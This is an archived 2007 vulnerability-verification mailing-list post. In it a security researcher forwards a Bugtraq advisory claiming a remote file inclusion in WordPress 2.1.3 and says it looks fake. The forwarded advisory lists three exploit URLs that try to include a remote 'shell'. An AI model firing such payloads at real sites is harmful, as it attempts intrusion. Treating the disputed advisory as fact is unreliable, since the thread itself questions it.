[VIM] [UNKNOWN] WordPress v2.1.3 >> remote file include~
Noam Rathaus
noamr at beyondsecurity.com
Thu Apr 26 07:37:30 UTC 2007
Hi,
I am unable to confirm this, anyone?
Looks fake, and untrue, wp-settings.php doesn't use anything called
require_once? weird
---------- Forwarded Message ----------
Subject: WordPress v2.1.3 >> remote file include~
Date: Wednesday 25 April 2007 11:17
From: s433d_only_linux at yahoo.de
To: bugtraq at securityfocus.com
by : www.hackeraz.ir userz , saeid...
++++++++++++++++++++++++++++++++++++
####################################################
#WordPress >> 2.1.3 Remote File Inclusion #
####################################################
Affected Software .: WordPress >> 2.1.3 #
Download..: http://wordpress-deutschland.org #
Risk ..............: high #
Date .........: 25/4/2007 #
Found by ..........: s433d_only_linux #
Contact ...........: s433d_only_linux at yahoo.de #
Web .............: Www.hackerz.ir #
special thanx ........... Ali Jasbi my beste friend#
####################################################
Affected File: #
wordpress/wp-settings.php #
wordpress/wp-includes/template-loader.php #
wordpress/wp-includes/theme.php #
####################################################
Exploit:
wordpress/wp-settings.php?require_once=shell?
wordpress/wp-includes/template-loader.php?include=shell?
wordpress/wp-includes/theme.php?require_once=shell?
######################################################
-------------------------------------------------------
--
Noam Rathaus
CTO
1616 Anderson Rd.
McLean, VA 22102
Tel: 703.286.7725 extension 105
Fax: 888.667.7740
noamr at beyondsecurity.com
http://www.beyondsecurity.com
More information about the VIM
mailing list